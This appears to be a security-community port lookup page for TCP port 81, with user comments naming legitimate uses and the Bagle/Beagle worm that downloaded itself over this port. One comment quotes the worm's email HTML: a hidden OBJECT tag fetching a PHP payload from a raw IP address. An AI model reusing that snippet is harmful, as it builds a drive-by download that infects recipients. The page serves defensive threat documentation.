Handler on Duty: Didier Stevens
Threat Level: green
Loading...
|
|
URL |
---|
WTF tcp port 81 |
DVRIP Port 34567 - Uptick |
Submitted By | Date |
---|---|
Comment | |
Steve Arnold | 2009-10-04 18:45:22 |
Reported today by Sophos as the port used by the e-mailed "carrier" (VBS script) of W32/Bagle-Q to download the virus. | |
TomazF | 2009-10-04 18:45:22 |
new version (18.03.2004) of worm Beagle is working on port 81, opens PHP with ActiveX script ans install sm.exe -> \winnt\system32\directs.exe and infects then plenty of EXEs see virus email body: <html><body> <font face="System"> <OBJECT STYLE="display:none" DATA="http://219.15.112.80:81/257480.php"> </OBJECT></body></html> Rgrds, Tomaz | |
Diesel | 2008-05-15 14:28:49 |
this port is used between http proxies | |
Just found | 2008-04-29 18:22:33 |
igo-incognito user-authentication-for-watchguard-products IGo Incognito Data Port http://www.watchguard.com/training/lss/45/auth3.ht | http://www.micromuse.com/products/descriptions.htm | IGo Incognito Data Port | |
Joshua | 2004-03-19 04:46:52 |
Secondary HTTP servers are often found on ports 81 through 83. | |
Tinga | 2004-02-10 19:49:57 |
Port is also used for McAfee ePO console to server communications |
CVE # | Description |
---|